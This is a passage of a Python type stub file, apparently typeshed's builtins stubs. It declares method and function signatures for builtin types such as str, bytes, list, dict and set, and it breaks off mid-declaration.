def __rdivmod__(self, x: float) -> Tuple[float, float]: ...
def __rpow__(self, x: float, mod: None = ...) -> float: ...
def __getnewargs__(self) -> Tuple[float]: ...
def __trunc__(self) -> int: ...
if sys.version_info >= (3, 9):
def __ceil__(self) -> int: ...
def __floor__(self) -> int: ...
@overload
def __round__(self, ndigits: None = ...) -> int: ...
@overload
def __round__(self, ndigits: int) -> float: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: float) -> bool: ...
def __le__(self, x: float) -> bool: ...
def __gt__(self, x: float) -> bool: ...
def __ge__(self, x: float) -> bool: ...
def __neg__(self) -> float: ...
def __pos__(self) -> float: ...
def __str__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
def __abs__(self) -> float: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
class complex:
@overload
def __new__(cls: Type[_T], real: float = ..., imag: float = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], real: Union[str, SupportsComplex, _SupportsIndex]) -> _T: ...
@property
def real(self) -> float: ...
@property
def imag(self) -> float: ...
def conjugate(self) -> complex: ...
def __add__(self, x: complex) -> complex: ...
def __sub__(self, x: complex) -> complex: ...
def __mul__(self, x: complex) -> complex: ...
def __pow__(self, x: complex, mod: None = ...) -> complex: ...
def __truediv__(self, x: complex) -> complex: ...
def __radd__(self, x: complex) -> complex: ...
def __rsub__(self, x: complex) -> complex: ...
def __rmul__(self, x: complex) -> complex: ...
def __rpow__(self, x: complex, mod: None = ...) -> complex: ...
def __rtruediv__(self, x: complex) -> complex: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __neg__(self) -> complex: ...
def __pos__(self) -> complex: ...
def __str__(self) -> str: ...
def __abs__(self) -> float: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
class _FormatMapMapping(Protocol):
def __getitem__(self, __key: str) -> Any: ...
class str(Sequence[str]):
@overload
def __new__(cls: Type[_T], o: object = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], o: bytes, encoding: str = ..., errors: str = ...) -> _T: ...
def capitalize(self) -> str: ...
def casefold(self) -> str: ...
def center(self, __width: int, __fillchar: str = ...) -> str: ...
def count(self, x: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def encode(self, encoding: str = ..., errors: str = ...) -> bytes: ...
def endswith(
self, __suffix: Union[str, Tuple[str, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> str: ...
def find(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def format(self, *args: object, **kwargs: object) -> str: ...
def format_map(self, map: _FormatMapMapping) -> str: ...
def index(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdecimal(self) -> bool: ...
def isdigit(self) -> bool: ...
def isidentifier(self) -> bool: ...
def islower(self) -> bool: ...
def isnumeric(self) -> bool: ...
def isprintable(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable: Iterable[str]) -> str: ...
def ljust(self, __width: int, __fillchar: str = ...) -> str: ...
def lower(self) -> str: ...
def lstrip(self, __chars: Optional[str] = ...) -> str: ...
def partition(self, __sep: str) -> Tuple[str, str, str]: ...
def replace(self, __old: str, __new: str, __count: int = ...) -> str: ...
if sys.version_info >= (3, 9):
def removeprefix(self, __prefix: str) -> str: ...
def removesuffix(self, __suffix: str) -> str: ...
def rfind(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: str = ...) -> str: ...
def rpartition(self, __sep: str) -> Tuple[str, str, str]: ...
def rsplit(self, sep: Optional[str] = ..., maxsplit: int = ...) -> List[str]: ...
def rstrip(self, __chars: Optional[str] = ...) -> str: ...
def split(self, sep: Optional[str] = ..., maxsplit: int = ...) -> List[str]: ...
def splitlines(self, keepends: bool = ...) -> List[str]: ...
def startswith(
self, __prefix: Union[str, Tuple[str, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __chars: Optional[str] = ...) -> str: ...
def swapcase(self) -> str: ...
def title(self) -> str: ...
def translate(self, __table: Union[Mapping[int, Union[int, str, None]], Sequence[Union[int, str, None]]]) -> str: ...
def upper(self) -> str: ...
def zfill(self, __width: int) -> str: ...
@staticmethod
@overload
def maketrans(__x: Union[Dict[int, _T], Dict[str, _T], Dict[Union[str, int], _T]]) -> Dict[int, _T]: ...
@staticmethod
@overload
def maketrans(__x: str, __y: str, __z: Optional[str] = ...) -> Dict[int, Union[int, None]]: ...
def __add__(self, s: str) -> str: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: str) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ge__(self, x: str) -> bool: ...
def __getitem__(self, i: Union[int, slice]) -> str: ...
def __gt__(self, x: str) -> bool: ...
def __hash__(self) -> int: ...
def __iter__(self) -> Iterator[str]: ...
def __le__(self, x: str) -> bool: ...
def __len__(self) -> int: ...
def __lt__(self, x: str) -> bool: ...
def __mod__(self, x: Any) -> str: ...
def __mul__(self, n: int) -> str: ...
def __ne__(self, x: object) -> bool: ...
def __repr__(self) -> str: ...
def __rmul__(self, n: int) -> str: ...
def __str__(self) -> str: ...
def __getnewargs__(self) -> Tuple[str]: ...
class bytes(ByteString):
@overload
def __new__(cls: Type[_T], ints: Iterable[int]) -> _T: ...
@overload
def __new__(cls: Type[_T], string: str, encoding: str, errors: str = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], length: int) -> _T: ...
@overload
def __new__(cls: Type[_T]) -> _T: ...
@overload
def __new__(cls: Type[_T], o: SupportsBytes) -> _T: ...
def capitalize(self) -> bytes: ...
def center(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def count(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def decode(self, encoding: str = ..., errors: str = ...) -> str: ...
def endswith(
self, __suffix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> bytes: ...
def find(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
def index(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdigit(self) -> bool: ...
def islower(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable_of_bytes: Iterable[Union[ByteString, memoryview]]) -> bytes: ...
def ljust(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def lower(self) -> bytes: ...
def lstrip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def partition(self, __sep: bytes) -> Tuple[bytes, bytes, bytes]: ...
def replace(self, __old: bytes, __new: bytes, __count: int = ...) -> bytes: ...
if sys.version_info >= (3, 9):
def removeprefix(self, __prefix: bytes) -> bytes: ...
def removesuffix(self, __suffix: bytes) -> bytes: ...
def rfind(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def rpartition(self, __sep: bytes) -> Tuple[bytes, bytes, bytes]: ...
def rsplit(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytes]: ...
def rstrip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def split(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytes]: ...
def splitlines(self, keepends: bool = ...) -> List[bytes]: ...
def startswith(
self, __prefix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def swapcase(self) -> bytes: ...
def title(self) -> bytes: ...
def translate(self, __table: Optional[bytes], delete: bytes = ...) -> bytes: ...
def upper(self) -> bytes: ...
def zfill(self, __width: int) -> bytes: ...
@classmethod
def fromhex(cls, __s: str) -> bytes: ...
@classmethod
def maketrans(cls, frm: bytes, to: bytes) -> bytes: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[int]: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
def __hash__(self) -> int: ...
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> bytes: ...
def __add__(self, s: bytes) -> bytes: ...
def __mul__(self, n: int) -> bytes: ...
def __rmul__(self, n: int) -> bytes: ...
def __mod__(self, value: Any) -> bytes: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: Union[int, bytes]) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: bytes) -> bool: ...
def __le__(self, x: bytes) -> bool: ...
def __gt__(self, x: bytes) -> bool: ...
def __ge__(self, x: bytes) -> bool: ...
def __getnewargs__(self) -> Tuple[bytes]: ...
class bytearray(MutableSequence[int], ByteString):
@overload
def __init__(self) -> None: ...
@overload
def __init__(self, ints: Iterable[int]) -> None: ...
@overload
def __init__(self, string: str, encoding: str, errors: str = ...) -> None: ...
@overload
def __init__(self, length: int) -> None: ...
def capitalize(self) -> bytearray: ...
def center(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def count(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def copy(self) -> bytearray: ...
def decode(self, encoding: str = ..., errors: str = ...) -> str: ...
def endswith(
self, __suffix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> bytearray: ...
def find(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
def index(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def insert(self, __index: int, __item: int) -> None: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdigit(self) -> bool: ...
def islower(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable_of_bytes: Iterable[Union[ByteString, memoryview]]) -> bytearray: ...
def ljust(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def lower(self) -> bytearray: ...
def lstrip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def partition(self, __sep: bytes) -> Tuple[bytearray, bytearray, bytearray]: ...
if sys.version_info >= (3, 9):
def removeprefix(self, __prefix: bytes) -> bytearray: ...
def removesuffix(self, __suffix: bytes) -> bytearray: ...
def replace(self, __old: bytes, __new: bytes, __count: int = ...) -> bytearray: ...
def rfind(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def rpartition(self, __sep: bytes) -> Tuple[bytearray, bytearray, bytearray]: ...
def rsplit(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytearray]: ...
def rstrip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def split(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytearray]: ...
def splitlines(self, keepends: bool = ...) -> List[bytearray]: ...
def startswith(
self, __prefix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def swapcase(self) -> bytearray: ...
def title(self) -> bytearray: ...
def translate(self, __table: Optional[bytes], delete: bytes = ...) -> bytearray: ...
def upper(self) -> bytearray: ...
def zfill(self, __width: int) -> bytearray: ...
@classmethod
def fromhex(cls, __string: str) -> bytearray: ...
@classmethod
def maketrans(cls, __frm: bytes, __to: bytes) -> bytes: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[int]: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
__hash__: None # type: ignore
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> bytearray: ...
@overload
def __setitem__(self, i: int, x: int) -> None: ...
@overload
def __setitem__(self, s: slice, x: Union[Iterable[int], bytes]) -> None: ...
def __delitem__(self, i: Union[int, slice]) -> None: ...
def __add__(self, s: bytes) -> bytearray: ...
def __iadd__(self, s: Iterable[int]) -> bytearray: ...
def __mul__(self, n: int) -> bytearray: ...
def __rmul__(self, n: int) -> bytearray: ...
def __imul__(self, n: int) -> bytearray: ...
def __mod__(self, value: Any) -> bytes: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: Union[int, bytes]) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: bytes) -> bool: ...
def __le__(self, x: bytes) -> bool: ...
def __gt__(self, x: bytes) -> bool: ...
def __ge__(self, x: bytes) -> bool: ...
class memoryview(Sized, Container[int]):
format: str
itemsize: int
shape: Optional[Tuple[int, ...]]
strides: Optional[Tuple[int, ...]]
suboffsets: Optional[Tuple[int, ...]]
readonly: bool
ndim: int
obj: Union[bytes, bytearray]
c_contiguous: bool
f_contiguous: bool
contiguous: bool
nbytes: int
def __init__(self, obj: ReadableBuffer) -> None: ...
def __enter__(self) -> memoryview: ...
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> None: ...
def cast(self, format: str, shape: Union[List[int], Tuple[int]] = ...) -> memoryview: ...
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> memoryview: ...
def __contains__(self, x: object) -> bool: ...
def __iter__(self) -> Iterator[int]: ...
def __len__(self) -> int: ...
@overload
def __setitem__(self, s: slice, o: bytes) -> None: ...
@overload
def __setitem__(self, i: int, o: int) -> None: ...
if sys.version_info >= (3, 8):
def tobytes(self, order: Optional[Literal["C", "F", "A"]] = ...) -> bytes: ...
else:
def tobytes(self) -> bytes: ...
def tolist(self) -> List[int]: ...
if sys.version_info >= (3, 8):
def toreadonly(self) -> memoryview: ...
def release(self) -> None: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
class bool(int):
def __new__(cls: Type[_T], __o: object = ...) -> _T: ...
@overload
def __and__(self, x: bool) -> bool: ...
@overload
def __and__(self, x: int) -> int: ...
@overload
def __or__(self, x: bool) -> bool: ...
@overload
def __or__(self, x: int) -> int: ...
@overload
def __xor__(self, x: bool) -> bool: ...
@overload
def __xor__(self, x: int) -> int: ...
@overload
def __rand__(self, x: bool) -> bool: ...
@overload
def __rand__(self, x: int) -> int: ...
@overload
def __ror__(self, x: bool) -> bool: ...
@overload
def __ror__(self, x: int) -> int: ...
@overload
def __rxor__(self, x: bool) -> bool: ...
@overload
def __rxor__(self, x: int) -> int: ...
def __getnewargs__(self) -> Tuple[int]: ...
class slice(object):
start: Any
step: Any
stop: Any
@overload
def __init__(self, stop: Any) -> None: ...
@overload
def __init__(self, start: Any, stop: Any, step: Any = ...) -> None: ...
__hash__: None # type: ignore
def indices(self, len: int) -> Tuple[int, int, int]: ...
class tuple(Sequence[_T_co], Generic[_T_co]):
def __new__(cls: Type[_T], iterable: Iterable[_T_co] = ...) -> _T: ...
def __len__(self) -> int: ...
def __contains__(self, x: object) -> bool: ...
@overload
def __getitem__(self, x: int) -> _T_co: ...
@overload
def __getitem__(self, x: slice) -> Tuple[_T_co, ...]: ...
def __iter__(self) -> Iterator[_T_co]: ...
def __lt__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __le__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __gt__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __ge__(self, x: Tuple[_T_co, ...]) -> bool: ...
@overload
def __add__(self, x: Tuple[_T_co, ...]) -> Tuple[_T_co, ...]: ...
@overload
def __add__(self, x: Tuple[Any, ...]) -> Tuple[Any, ...]: ...
def __mul__(self, n: int) -> Tuple[_T_co, ...]: ...
def __rmul__(self, n: int) -> Tuple[_T_co, ...]: ...
def count(self, __value: Any) -> int: ...
def index(self, __value: Any, __start: int = ..., __stop: int = ...) -> int: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class function:
# TODO not defined in builtins!
__name__: str
__module__: str
__code__: CodeType
__qualname__: str
__annotations__: Dict[str, Any]
class list(MutableSequence[_T], Generic[_T]):
@overload
def __init__(self) -> None: ...
@overload
def __init__(self, iterable: Iterable[_T]) -> None: ...
def clear(self) -> None: ...
def copy(self) -> List[_T]: ...
def append(self, __object: _T) -> None: ...
def extend(self, __iterable: Iterable[_T]) -> None: ...
def pop(self, __index: int = ...) -> _T: ...
def index(self, __value: _T, __start: int = ..., __stop: int = ...) -> int: ...
def count(self, __value: _T) -> int: ...
def insert(self, __index: int, __object: _T) -> None: ...
def remove(self, __value: _T) -> None: ...
def reverse(self) -> None: ...
@overload
def sort(self: List[SupportsLessThanT], *, key: None = ..., reverse: bool = ...) -> None: ...
@overload
def sort(self, *, key: Callable[[_T], SupportsLessThan], reverse: bool = ...) -> None: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[_T]: ...
def __str__(self) -> str: ...
__hash__: None # type: ignore
@overload
def __getitem__(self, i: _SupportsIndex) -> _T: ...
@overload
def __getitem__(self, s: slice) -> List[_T]: ...
@overload
def __setitem__(self, i: _SupportsIndex, o: _T) -> None: ...
@overload
def __setitem__(self, s: slice, o: Iterable[_T]) -> None: ...
def __delitem__(self, i: Union[_SupportsIndex, slice]) -> None: ...
def __add__(self, x: List[_T]) -> List[_T]: ...
def __iadd__(self: _S, x: Iterable[_T]) -> _S: ...
def __mul__(self, n: int) -> List[_T]: ...
def __rmul__(self, n: int) -> List[_T]: ...
def __imul__(self: _S, n: int) -> _S: ...
def __contains__(self, o: object) -> bool: ...
def __reversed__(self) -> Iterator[_T]: ...
def __gt__(self, x: List[_T]) -> bool: ...
def __ge__(self, x: List[_T]) -> bool: ...
def __lt__(self, x: List[_T]) -> bool: ...
def __le__(self, x: List[_T]) -> bool: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class dict(MutableMapping[_KT, _VT], Generic[_KT, _VT]):
@overload
def __init__(self: Dict[_KT, _VT]) -> None: ...
@overload
def __init__(self: Dict[str, _VT], **kwargs: _VT) -> None: ...
@overload
def __init__(self, map: SupportsKeysAndGetItem[_KT, _VT], **kwargs: _VT) -> None: ...
@overload
def __init__(self, iterable: Iterable[Tuple[_KT, _VT]], **kwargs: _VT) -> None: ...
def __new__(cls: Type[_T1], *args: Any, **kwargs: Any) -> _T1: ...
def clear(self) -> None: ...
def copy(self) -> Dict[_KT, _VT]: ...
def popitem(self) -> Tuple[_KT, _VT]: ...
def setdefault(self, __key: _KT, __default: _VT = ...) -> _VT: ...
@overload
def update(self, __m: Mapping[_KT, _VT], **kwargs: _VT) -> None: ...
@overload
def update(self, __m: Iterable[Tuple[_KT, _VT]], **kwargs: _VT) -> None: ...
@overload
def update(self, **kwargs: _VT) -> None: ...
def keys(self) -> KeysView[_KT]: ...
def values(self) -> ValuesView[_VT]: ...
def items(self) -> ItemsView[_KT, _VT]: ...
@classmethod
@overload
def fromkeys(cls, __iterable: Iterable[_T]) -> Dict[_T, Any]: ...
@classmethod
@overload
def fromkeys(cls, __iterable: Iterable[_T], __value: _S) -> Dict[_T, _S]: ...
def __len__(self) -> int: ...
def __getitem__(self, k: _KT) -> _VT: ...
def __setitem__(self, k: _KT, v: _VT) -> None: ...
def __delitem__(self, v: _KT) -> None: ...
def __iter__(self) -> Iterator[_KT]: ...
if sys.version_info >= (3, 8):
def __reversed__(self) -> Iterator[_KT]: ...
def __str__(self) -> str: ...
__hash__: None # type: ignore
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
def __or__(self, __value: Mapping[_KT, _VT]) -> Dict[_KT, _VT]: ...
def __ior__(self, __value: Mapping[_KT, _VT]) -> Dict[_KT, _VT]: ...
class set(MutableSet[_T], Generic[_T]):
def __init__(self, iterable: Iterable[_T] = ...) -> None: ...
def add(self, element: _T) -> None: ...
def clear(self) -> None: ...
def copy(self) -> Set[_T]: ...
def difference(self, *s: Iterable[Any]) -> Set[_T]: ...
def difference_update(self, *s: Iterable[Any]) -> None: ...
def discard(self, element: _T) -> None: ...
def intersection(self, *s: Iterable[Any]) -> Set[_T]: ...
def intersection_update(self, *s: Iterable[Any]) -> None: ...
def isdisjoint(self, s: Iterable[Any]) -> bool: ...
def issubset(self, s: Iterable[Any]) -> bool: ...
def issuperset(self, s: Iterable[Any]) -> bool: ...
def pop(self) -> _T: ...
def remove(self, element: _T) -> None: ...
def symmetric_difference(self, s: Iterable[_T]) -> Set[_T]: ...
def symmetric_difference_update(self, s: Iterable[_T]) -> None: ...
def union(self, *s: Iterable[_T]) -> Set[_T]: ...
def update(self, *s: Iterable[_T]) -> None: ...
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[_T]: ...
def __str__(self) -> str: ...
def __and__(self, s: AbstractSet[object]) -> Set[_T]: ...
def __iand__(self, s: AbstractSet[object]) -> Set[_T]: ...
def __or__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __ior__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __sub__(self, s: AbstractSet[Optional[_T]]) -> Set[_T]: ...
def __isub__(self, s: AbstractSet[Optional[_T]]) -> Set[_T]: ...
def __xor__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __ixor__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __le__(self, s: AbstractSet[object]) -> bool: ...
def __lt__(self, s: AbstractSet[object]) -> bool: ...
def __ge__(self, s: AbstractSet[object]) -> bool: ...
def __gt__(self, s: AbstractSet[object]) -> bool: ...
__hash__: None # type: ignore
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class frozenset(AbstractSet[_T_co], Generic[_T_co]):
def __init__(self, iterable: Iterable[_T_co] = ...) -> None: ...
def copy(self) -> FrozenSet[_T_co]: ...
def difference(self, *s: Iterable[object]) -> FrozenSet[_T_co]: ...
def intersection(self, *s: Iterable[object]) -> FrozenSet[_T_co]: ...
def isdisjoint(self, s: Iterable[_T_co]) -> bool: ...
def issubset(self, s: Iterable[object]) -> bool: ...
def issuperset(self, s: Iterable[object]) -> bool: ...
def symmetric_difference(self, s: Iterable[_T_co]) -> FrozenSet[_T_co]: ...
def union(self, *s: Iterable[_T_co]) -> FrozenSet[_T_co]: ...
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[_T_co]: ...
def __str__(self) -> str: ...
def __and__(self, s: AbstractSet[_T_co]) -> FrozenSet[_T_co]: ...
def __or__(self, s: AbstractSet[_S]) -> FrozenSet[Union[_T_co, _S]]: ...
def __sub__(self, s: AbstractSet[_T_co]) -> FrozenSet[_T_co]: ...
def __xor__(self, s: AbstractSet[_S]) -> FrozenSet[Union[_T_co, _S]]: ...
def __le__(self, s: AbstractSet[object]) -> bool: ...
def __lt__(self, s: AbstractSet[object]) -> bool: ...
def __ge__(self, s: AbstractSet[object]) -> bool: ...
def __gt__(self, s: AbstractSet[object]) -> bool: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class enumerate(Iterator[Tuple[int, _T]], Generic[_T]):
def __init__(self, iterable: Iterable[_T], start: int = ...) -> None: ...
def __iter__(self) -> Iterator[Tuple[int, _T]]: ...
def __next__(self) -> Tuple[int, _T]: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class range(Sequence[int]):
start: int
stop: int
step: int
@overload
def __init__(self, stop: _SupportsIndex) -> None: ...
@overload
def __init__(self, start: _SupportsIndex, stop: _SupportsIndex, step: _SupportsIndex = ...) -> None: ...
def count(self, value: int) -> int: ...
def index(self, value: int) -> int: ... # type: ignore
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[int]: ...
@overload
def __getitem__(self, i: _SupportsIndex) -> int: ...
@overload
def __getitem__(self, s: slice) -> range: ...
def __repr__(self) -> str: ...
def __reversed__(self) -> Iterator[int]: ...
class property(object):
def __init__(
self,
fget: Optional[Callable[[Any], Any]] = ...,
fset: Optional[Callable[[Any, Any], None]] = ...,
fdel: Optional[Callable[[Any], None]] = ...,
doc: Optional[str] = ...,
) -> None: ...
def getter(self, fget: Callable[[Any], Any]) -> property: ...
def setter(self, fset: Callable[[Any, Any], None]) -> property: ...
def deleter(self, fdel: Callable[[Any], None]) -> property: ...
def __get__(self, obj: Any, type: Optional[type] = ...) -> Any: ...
def __set__(self, obj: Any, value: Any) -> None: ...
def __delete__(self, obj: Any) -> None: ...
def fget(self) -> Any: ...
def fset(self, value: Any) -> None: ...
def fdel(self) -> None: ...
class _NotImplementedType(Any): # type: ignore
# A little weird, but typing the __call__ as NotImplemented makes the error message
# for NotImplemented() much better
__call__: NotImplemented # type: ignore
NotImplemented: _NotImplementedType
def abs(__x: SupportsAbs[_T]) -> _T: ...
def all(__iterable: Iterable[object]) -> bool: ...
def any(__iterable: Iterable[object]) -> bool: ...
def ascii(__obj: object) -> str: ...
def bin(__number: Union[int, _SupportsIndex]) -> str: ...
if sys.version_info >= (3, 7):
def breakpoint(*args: Any, **kws: Any) -> None: ...
def callable(__obj: object) -> bool: ...
def chr(__i: int) -> str: ...
# This class is to be exported as PathLike from os,
# but we define it here as _PathLike to avoid import cycle issues.
# See https://github.com/python/typeshed/pull/991#issuecomment-288160993
_AnyStr_co = TypeVar("_AnyStr_co", str, bytes, covariant=True)
@runtime_checkable
class _PathLike(Protocol[_AnyStr_co]):
def __fspath__(self) -> _AnyStr_co: ...
if sys.version_info >= (3, 8):
def compile(
source: Union[str, bytes, mod, AST],
filename: Union[str, bytes, _PathLike[Any]],
mode: str,
flags: int = ...,
dont_inherit: int = ...,
optimize: int = ...,
*,
_feature_version: int = ...,
) -> Any: ...
else:
def compile(
source: Union[str, bytes, mod, AST],
filename: Union[str, bytes, _PathLike[Any]],
mode: str,
flags: int = ...,
dont_inherit: int = ...,
optimize: int = ...,
) -> Any: ...
def copyright() -> None: ...
def credits() -> None: ...
def delattr(__obj: Any, __name: str) -> None: ...
def dir(__o: object = ...) -> List[str]: ...
@overload
def divmod(__x: SupportsDivMod[_T_contra, _T_co], __y: _T_contra) -> _T_co: ...
@overload
def divmod(__x: _T_contra, __y: SupportsRDivMod[_T_contra, _T_co]) -> _T_co: ...
def eval(
__source: Union[str, bytes, CodeType], __globals: Optional[Dict[str, Any]] = ..., __locals: Optional[Mapping[str, Any]] = ...
) -> Any: ...
def exec(
__source: Union[str, bytes, CodeType],
__globals: Optional[Dict[str, Any]] = ...,
__locals: Optional[Mapping[str, Any]] = ...,
) -> Any: ...
def exit(code: object = ...) -> NoReturn: ...
@overload
def filter(__function: None, __iterable: Iterable[Optional[_T]]) -> Iterator[_T]: ...
@overload
def filter(__function: Callable[[_T], Any], __iterable: Iterable[_T]) -> Iterator[_T]: ...
def format(__value: object, __format_spec: str = ...) -> str: ... # TODO unicode
def getattr(__o: Any, name: str, __default: Any = ...) -> Any: ...
def globals() -> Dict[str, Any]: ...
def hasattr(__obj: Any, __name: str) -> bool: ...
def hash(__obj: object) -> int: ...
def help(*args: Any, **kwds: Any) -> None: ...
def hex(__number: Union[int, _SupportsIndex]) -> str: ...
def id(__obj: object) -> int: ...
def input(__prompt: Any = ...) -> str: ...
@overload
def iter(__iterable: Iterable[_T]) -> Iterator[_T]: ...
@overload
def iter(__function: Callable[[], Optional[_T]], __sentinel: None) -> Iterator[_T]: ...
@overload
def iter(__function: Callable[[], _T], __sentinel: Any) -> Iterator[_T]: ...
def isinstance(__obj: object, __class_or_tuple: Union[type, Tuple[Union[type, Tuple[Any, ...]], ...]]) -> bool: ...
def issubclass(__cls: type, __class_or_tuple: Union[type, Tuple[Union[type, Tuple[Any, ...]], ...]]) -> bool: ...
def len(__obj: Sized) -> int: ...
def license() -> None: ...
def locals() -> Dict[str, Any]: ...
@overload
def map(__func: Callable[[_T1], _S], __iter1: Iterable[_T1]) -> Iterator[_S]: ...
@overload
def map(__func: Callable[[_T1, _T2], _S], __iter1: Iterable[_T1], __iter2: Iterable[_T2]) -> Iterator[_S]: ...
@overload
def map(
